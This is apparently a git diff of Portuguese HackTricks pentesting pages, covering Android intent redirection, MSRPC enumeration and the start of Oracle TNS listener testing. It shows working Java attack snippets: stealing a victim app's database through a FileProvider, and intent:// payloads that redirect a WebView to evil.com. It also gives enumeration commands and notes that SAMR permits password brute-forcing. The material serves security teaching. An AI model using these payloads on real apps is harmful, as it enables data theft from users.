<cache-path name="cache" path=""/>
<external-path name="external_files" path="images"/>
</paths>
```
Cada tag especifica um diretório raiz com um valor `path` relativo à raiz. Por exemplo, o valor `external_files` corresponderá a `new File(Environment.getExternalStorageDirectory(), "images")`
O valor `root-path` corresponde a `/`, ou seja, fornece acesso a arquivos arbitrários.
Digamos que temos alguns dados secretos armazenados no arquivo `/data/data/com.victim/databases/secret.db`: o roubo deste arquivo pode parecer algo como isto `MainActivity.java`
```java
Intent extra = new Intent();
extra.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
extra.setClassName(getPackageName(), "com.attacker.LeakActivity");
extra.setData(Uri.parse("content://com.victim.files_provider/root/data/data/com.victim/databases/secret.db"));
Intent intent = new Intent();
intent.setClassName("com.victim", "com.victim.ProxyActivity");
intent.putExtra("extra_intent", extra);
startActivity(intent);
```
`LeakActivity.java`
```java
InputStream i = getContentResolver().openInputStream(getIntent().getData()); // we can now do whatever we like with this stream, e.g. send it to a remote server
```
## Acesso a componentes arbitrários via WebView
Um objeto Intent pode ser convertido para uma string com uma chamada a `Intent.toUri(flags)` e de volta de uma string para um Intent usando `Intent.parseUri(stringUri, flags)`. Essa funcionalidade é frequentemente usada no WebView (o navegador embutido do app): **o app pode verificar um esquema `intent://`, analisar a URL em um Intent e iniciar a atividade**.
**Essa vulnerabilidade pode ser explorada tanto através de outras vulnerabilidades** (por exemplo, a capacidade de abrir links arbitrários no app no WebView diretamente via atividades exportadas ou por meio do mecanismo de deeplink) no app cliente quanto remotamente, incluindo scripting entre sites no lado do servidor ou MitM no lado do cliente.
Exemplo de código vulnerável
```java
public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
Uri uri = request.getUrl();
if("intent".equals(uri.getScheme())) {
startActivity(Intent.parseUri(uri.toString(), Intent.URI_INTENT_SCHEME));
return true;
}
return super.shouldOverrideUrlLoading(view, request);
}
```
O ponto aqui é que o método `shouldOverrideUrlLoading(...)` da classe `WebViewClient` é chamado toda vez que o WebView tenta carregar um novo link, mas dá ao aplicativo a opção de adicionar um manipulador personalizado.
Para explorar essa vulnerabilidade, o atacante precisa criar um redirecionamento do WebView para uma URL de esquema de intent especialmente preparada. Exemplo de criação de URL
```java
Intent intent = new Intent();
intent.setClassName("com.victim", "com.victim.AuthWebViewActivity");
intent.putExtra("url", "http://evil.com/");
Log.d("evil", intent.toUri(Intent.URI_INTENT_SCHEME)); // outputs "intent:#Intent;component=com.victim/.AuthWebViewActivity;S.url=http%3A%2F%2Fevil.com%2F;end"
```
Exemplo de ataque
```java
location.href = "intent:#Intent;component=com.victim/.AuthWebViewActivity;S.url=http%3A%2F%2Fevil.com%2F;end";
```
Esta versão contém **várias restrições comparadas à versão clássica** da vulnerabilidade:
* Objetos `Parcelable` e `Serializable` embutidos não podem ser convertidos para string (eles serão ignorados)
* As flags inseguras `Intent.FLAG_GRANT_READ_URI_PERMISSION` e `Intent.FLAG_GRANT_WRITE_URI_PERMISSION` são **ignoradas** quando `Intent.parseUri(...)` é chamado. O analisador só as deixará se a flag `Intent.URI_ALLOW_UNSAFE` (`startActivity(Intent.parseUri(url, Intent.URI_INTENT_SCHEME | Intent.URI_ALLOW_UNSAFE))`) estiver definida, o que é muito raro
Muitos desenvolvedores ainda esquecem de realizar um filtro completo de intents recebidos via WebView
```java
public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
Uri uri = request.getUrl();
if("intent".equals(uri.getScheme())) {
Intent intent = Intent.parseUri(uri.toString(), Intent.URI_INTENT_SCHEME);
intent.addCategory("android.intent.category.BROWSABLE");
intent.setComponent(null);
startActivity(intent);
return true;
}
return super.shouldOverrideUrlLoading(view, request);
}
```
O atacante pode especificar um componente não exportado por meio de um seletor
```java
Intent intent = new Intent();
intent.setSelector(new Intent().setClassName("com.victim", "com.victim.AuthWebViewActivity"));
intent.putExtra("url", "http://evil.com/");
Log.d("evil", intent.toUri(Intent.URI_INTENT_SCHEME)); // "intent:#Intent;S.url=http%3A%2F%2Fevil.com%2F;SEL;component=com.victim/.AuthWebViewActivity;end"
```
E contornar a proteção do aplicativo contra intents explícitos. Portanto, recomendamos também filtrar o seletor.
```java
intent.addCategory("android.intent.category.BROWSABLE");
intent.setComponent(null);
intent.setSelector(null);
```
Mas mesmo um filtro completo não garante proteção total, porque um atacante pode criar um `intent` implícito correspondente ao `intent-filter` de alguma atividade não exportada. Exemplo de declaração de atividade:
```markup
<activity android:name=".AuthWebViewActivity" android:exported="false">
<intent-filter>
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<data android:scheme="victim" android:host="secure_handler" />
</intent-filter>
</activity>
```
```java
webView.loadUrl(getIntent().getData().getQueryParameter("url"), getAuthHeaders());
```
Recomendamos, portanto, verificar se uma atividade está exportada antes de ser iniciada.
## Outras formas de criar intents inseguros
Alguns desenvolvedores de aplicativos implementam seus **próprios analisadores de intents** (muitas vezes para lidar com **deeplinks** ou mensagens push), usando, por exemplo, objetos **JSON**, strings ou arrays de bytes, que ou não diferem do padrão ou representam um grande perigo, pois podem expandir objetos **`Serializable`** e `Parcelable` e também permitem a configuração de flags inseguras. O pesquisador de segurança também pode encontrar versões mais exóticas de criação de intents, como converter um array de bytes em um `Parcel` e depois ler um intent a partir dele.
```java
Uri deeplinkUri = getIntent().getData();
if(deeplinkUri.toString().startsWith("deeplink://handle/")) {
byte[] handle = Base64.decode(deeplinkUri.getQueryParameter("param"), 0);
Parcel parcel = Parcel.obtain();
parcel.unmarshall(handle, 0, handle.length);
startActivity((Intent) parcel.readParcelable(getClassLoader()));
}
```
# Aplicativo Vulnerável
{% embed url="https://github.com/oversecured/ovaa" %}
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao grupo do** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo do [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
**Dê uma olhada em: [https://blog.oversecured.com/Android-Access-to-app-protected-components/**](https://blog.oversecured.com/Android-Access-to-app-protected-components/)**
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>

156
network-services-pentesting/135-pentesting-msrpc.md
View file

@ -2,71 +2,58 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
<figure><img src="../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
Junte-se ao servidor [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) para se comunicar com hackers experientes e caçadores de recompensas por bugs!
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando os clientes depositam o orçamento de recompensa. Você receberá a recompensa após a verificação do bug.
**Percepções de Hacking**\
Envolver-se com conteúdo que explora a emoção e os desafios do hacking
**Adquira experiência em pentesting web3**\
Protocolos de blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
**Notícias de Hacking em Tempo Real**\
Mantenha-se atualizado com o mundo acelerado do hacking através de notícias e percepções em tempo real
**Torne-se a lenda do hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
**Últimos Anúncios**\
Fique informado sobre os mais recentes programas de recompensas por bugs lançados e atualizações cruciais da plataforma
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) comece a ganhar com seus hacks!
{% embed url="https://hackenproof.com/register" %}
**Junte-se a nós no** [**Discord**](https://discord.com/invite/N3FrSbmwdy) e comece a colaborar com os melhores hackers hoje!
## Informações Básicas
Microsoft Remote Procedure Call, também conhecido como chamada de função ou chamada de sub-rotina, é [um protocolo](http://searchmicroservices.techtarget.com/definition/Remote-Procedure-Call-RPC) que utiliza o modelo cliente-servidor para permitir que um programa solicite serviço de um programa em outro computador sem precisar entender os detalhes da rede desse computador. O MSRPC foi originalmente derivado de software de código aberto, mas foi desenvolvido e protegido por direitos autorais pela Microsoft.
O protocolo Microsoft Remote Procedure Call (MSRPC), um modelo cliente-servidor que permite a um programa solicitar um serviço de um programa localizado em outro computador sem entender os detalhes da rede, foi inicialmente derivado de software de código aberto e posteriormente desenvolvido e protegido por direitos autorais pela Microsoft.
Dependendo da configuração do host, o mapeador de ponto de extremidade RPC pode ser acessado através das portas TCP e UDP 135, via SMB com uma sessão nula ou autenticada (TCP 139 e 445) e como um serviço da web ouvindo na porta TCP 593.
O mapeador de pontos de extremidade RPC pode ser acessado via porta TCP e UDP 135, SMB no TCP 139 e 445 (com uma sessão nula ou autenticada), e como um serviço da web na porta TCP 593.
```
135/tcp open msrpc Microsoft Windows RPC
```
## Como funciona o MSRPC?
O processo do MSRPC começa no lado do cliente, com a aplicação do cliente chamando um procedimento de stub local em vez de código que implementa o procedimento. O código de stub do cliente recupera os parâmetros necessários do espaço de endereço do cliente e os entrega à biblioteca de tempo de execução do cliente, que então traduz os parâmetros em um formato padrão de Representação de Dados de Rede para transmitir ao servidor.
Iniciado pela aplicação cliente, o processo MSRPC envolve chamar um procedimento stub local que interage com a biblioteca de tempo de execução do cliente para preparar e transmitir a solicitação para o servidor. Isso inclui a conversão de parâmetros em um formato padrão de Representação de Dados de Rede. A escolha do protocolo de transporte é determinada pela biblioteca de tempo de execução se o servidor for remoto, garantindo que o RPC seja entregue através da pilha de rede.
O stub do cliente então chama funções na biblioteca de tempo de execução do cliente RPC para enviar a solicitação e os parâmetros para o servidor. Se o servidor estiver localizado remotamente, a biblioteca de tempo de execução especifica um protocolo de transporte apropriado e um mecanismo e passa o RPC para a pilha de rede para transporte ao servidor.\
A partir daqui: [https://www.extrahop.com/resources/protocols/msrpc/](https://www.extrahop.com/resources/protocols/msrpc/)
![https://0xffsec.com/handbook/images/msrpc.png](https://0xffsec.com/handbook/images/msrpc.png)
![](<../.gitbook/assets/image (133).png>)
## **Identificação de Serviços RPC Expostos**
**Imagem do livro "**_**Network Security Assesment 3rd Edition**_**"**
## **Identificando Serviços RPC Expostos**
**Seção extraída do livro "**_**Network Security Assesment 3rd Edition**_**"**
Você pode consultar o serviço de localizador RPC e os pontos de extremidade RPC individuais para catalogar serviços interessantes em execução sobre TCP, UDP, HTTP e SMB (por meio de named pipes). Cada valor IFID coletado por meio desse processo denota um serviço RPC (por exemplo, 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc é a interface Messenger).
As ferramentas rpcdump e ifids do Windows de Todd Sabin consultam tanto o localizador RPC quanto os pontos de extremidade RPC específicos para listar os valores IFID. A sintaxe do rpcdump é a seguinte:
A exposição de serviços RPC através de TCP, UDP, HTTP e SMB pode ser determinada consultando o serviço de localização RPC e os pontos finais individuais. Ferramentas como rpcdump facilitam a identificação de serviços RPC únicos, denotados por valores **IFID**, revelando detalhes do serviço e vinculações de comunicação:
```
D:\rpctools> rpcdump [-p port] 192.168.189.1
IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
D:\rpctools> rpcdump [-p port] <IP>
**IFID**: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:192.168.189.1[1028]
Binding: ncadg_ip_udp:<IP>[1028]
```
Você pode acessar o serviço de localização RPC usando quatro sequências de protocolo:
* ncacn\_ip\_tcp e ncadg\_ip\_udp (porta TCP e UDP 135)
* ncacn\_np (o pipe \epmapper nomeado via SMB)
* ncacn\_http (RPC sobre HTTP via porta TCP 80, 593 e outros)
O acesso ao serviço de localização RPC é habilitado por meio de protocolos específicos: ncacn\_ip\_tcp e ncadg\_ip\_udp para acesso via porta 135, ncacn\_np para conexões SMB e ncacn\_http para comunicação RPC baseada na web. Os comandos a seguir exemplificam a utilização de módulos do Metasploit para auditoria e interação com serviços MSRPC, focando principalmente na porta 135:
```bash
use auxiliary/scanner/dcerpc/endpoint_mapper
use auxiliary/scanner/dcerpc/hidden
@ -74,63 +61,82 @@ use auxiliary/scanner/dcerpc/management
use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
rpcdump.py <IP> -p 135
```
_Nota que das opções mencionadas, todas exceto **`tcp_dcerpc_auditor`** podem ser executadas apenas contra **msrpc** na porta **135**._
Todas as opções, exceto `tcp_dcerpc_auditor`, são especificamente projetadas para visar o MSRPC na porta 135.
#### Interfaces RPC notáveis
| **Valor IFID** | **Named pipe** | **Descrição** |
| ------------------------------------ | -------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 12345778-1234-abcd-ef00-0123456789ab | \pipe\lsarpc | Interface LSA, usada para enumerar usuários |
| 3919286a-b10c-11d0-9ba8-00c04fd92ef5 | \pipe\lsarpc | Interface LSA Directory Services (DS), usada para enumerar domínios e relacionamentos de confiança |
| 12345778-1234-abcd-ef00-0123456789ac | \pipe\samr | Interface LSA SAMR, usada para acessar elementos públicos do banco de dados SAM (por exemplo, nomes de usuários) e forçar a senha de usuários por força bruta, independentemente da política de bloqueio de contas [Biblioteca Oreilly](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#idm139659172852688) |
| 1ff70682-0a51-30e8-076d-740be8cee98b | \pipe\atsvc | Agendador de tarefas, usado para executar comandos remotamente |
| 338cd001-2244-31f1-aaaa-900038001003 | \pipe\winreg | Serviço de registro remoto, usado para acessar o registro do sistema |
| 367abb81-9844-35f1-ad32-98f038001003 | \pipe\svcctl | Gerenciador de controle de serviço e serviços do servidor, usado para iniciar e parar serviços remotamente e executar comandos |
| 4b324fc8-1670-01d3-1278-5a47bf6ee188 | \pipe\srvsvc | Gerenciador de controle de serviço e serviços do servidor, usado para iniciar e parar serviços remotamente e executar comandos |
| 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 | \pipe\epmapper | Interface DCOM, suportando WMI |
**IFID**: 12345778-1234-abcd-ef00-0123456789ab
**Named Pipe**: \pipe\lsarpc
**Descrição**: Interface LSA, usada para enumerar usuários.
**IFID**: 3919286a-b10c-11d0-9ba8-00c04fd92ef5
**Named Pipe**: \pipe\lsarpc
**Descrição**: Interface de Serviços de Diretório (DS) LSA, usada para enumerar domínios e relacionamentos de confiança.
**IFID**: 12345778-1234-abcd-ef00-0123456789ac
**Named Pipe**: \pipe\samr
**Descrição**: Interface SAMR LSA, usada para acessar elementos públicos do banco de dados SAM (por exemplo, nomes de usuários) e forçar senhas de usuários, independentemente da política de bloqueio de conta.
**IFID**: 1ff70682-0a51-30e8-076d-740be8cee98b
**Named Pipe**: \pipe\atsvc
**Descrição**: Agendador de tarefas, usado para executar comandos remotamente.
**IFID**: 338cd001-2244-31f1-aaaa-900038001003
**Named Pipe**: \pipe\winreg
**Descrição**: Serviço de registro remoto, usado para acessar e modificar o registro do sistema.
**IFID**: 367abb81-9844-35f1-ad32-98f038001003
**Named Pipe**: \pipe\svcctl
**Descrição**: Gerenciador de controle de serviços e serviços de servidor, usado para iniciar e parar serviços remotamente e executar comandos.
**IFID**: 4b324fc8-1670-01d3-1278-5a47bf6ee188
**Named Pipe**: \pipe\srvsvc
**Descrição**: Gerenciador de controle de serviços e serviços de servidor, usado para iniciar e parar serviços remotamente e executar comandos.
**IFID**: 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57
**Named Pipe**: \pipe\epmapper
**Descrição**: Interface DCOM, usada para forçar a moagem de senhas e coletar informações via WM.
### Identificando endereços IP
Usando [https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDResolver), proveniente da pesquisa da [Airbus](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/), é possível abusar do método _**ServerAlive2**_ dentro da interface _**IOXIDResolver**_.
Esse método tem sido usado para obter informações de interface como endereço **IPv6** do HTB box _APT_. Veja [aqui](https://0xdf.gitlab.io/2021/04/10/htb-apt.html) o writeup do APT 0xdf, que inclui um método alternativo usando rpcmap.py do [Impacket](https://github.com/SecureAuthCorp/impacket/) com _stringbinding_ (veja acima).
Referências:
* [https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/)
* [https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/](https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/)
Este método foi usado para obter informações de interface como endereço **IPv6** da caixa HTB _APT_. Veja [aqui](https://0xdf.gitlab.io/2021/04/10/htb-apt.html) para o artigo do 0xdf sobre APT, que inclui um método alternativo usando rpcmap.py do [Impacket](https://github.com/SecureAuthCorp/impacket/) com _stringbinding_ (veja acima).
## Porta 593
O **rpcdump.exe** do [rpctools](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools) pode interagir com essa porta.
O **rpcdump.exe** de [rpctools](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools) pode interagir com esta porta.
## Referências
* [https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/)
* [https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/](https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/)
* [https://0xffsec.com/handbook/services/msrpc/](https://0xffsec.com/handbook/services/msrpc/)
<figure><img src="../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
Junte-se ao servidor [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) para se comunicar com hackers experientes e caçadores de bugs!
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando os clientes depositam o orçamento de recompensa. Você receberá a recompensa após a verificação do bug.
**Percepções de Hacking**\
Engaje-se com conteúdo que explora a emoção e os desafios do hacking
**Adquira experiência em pentesting web3**\
Protocolos de blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
**Notícias de Hacking em Tempo Real**\
Mantenha-se atualizado com o mundo acelerado do hacking por meio de notícias e insights em tempo real
**Torne-se a lenda do hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
**Últimos Anúncios**\
Fique informado sobre os novos programas de recompensas por bugs lançados e atualizações cruciais da plataforma
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) comece a ganhar com seus hacks!
{% embed url="https://hackenproof.com/register" %}
**Junte-se a nós no** [**Discord**](https://discord.com/invite/N3FrSbmwdy) e comece a colaborar com os melhores hackers hoje!
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

259
network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md
View file

@ -1,16 +1,16 @@
# 1521,1522-1529 - Pentesting Oracle TNS Listener
# 1521,1522-1529 - Teste de penetração no Oracle TNS Listener
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
@ -18,232 +18,31 @@ Outras formas de apoiar o HackTricks:
O banco de dados Oracle (Oracle DB) é um sistema de gerenciamento de banco de dados relacional (RDBMS) da Oracle Corporation (de [aqui](https://www.techopedia.com/definition/8711/oracle-database)).
Ao enumerar o Oracle, o primeiro passo é se comunicar com o TNS-Listener que geralmente reside na porta padrão (1521/TCP, -você também pode encontrar listeners secundários nas portas 15221529-).
Ao enumerar o Oracle, o primeiro passo é falar com o TNS-Listener que geralmente reside na porta padrão (1521/TCP, -você também pode encontrar ouvintes secundários em 15221529-).
```
1521/tcp open oracle-tns Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows)
1748/tcp open oracle-tns Oracle TNS Listener
```
## Resumo
## Sumário
1. **Enumerar informações da versão** (procurar por **vulns conhecidas**)
2. **Força bruta no TNS listener** (nem sempre necessário)
3. **Enumerar**/Força bruta em **nomes de SID** (como nomes de bancos de dados)
4. **Força bruta nas credenciais** para nome de SID válido descoberto
5. Tentar **executar código**
1. **Enumeração de Versão**: Identificar informações de versão para procurar por vulnerabilidades conhecidas.
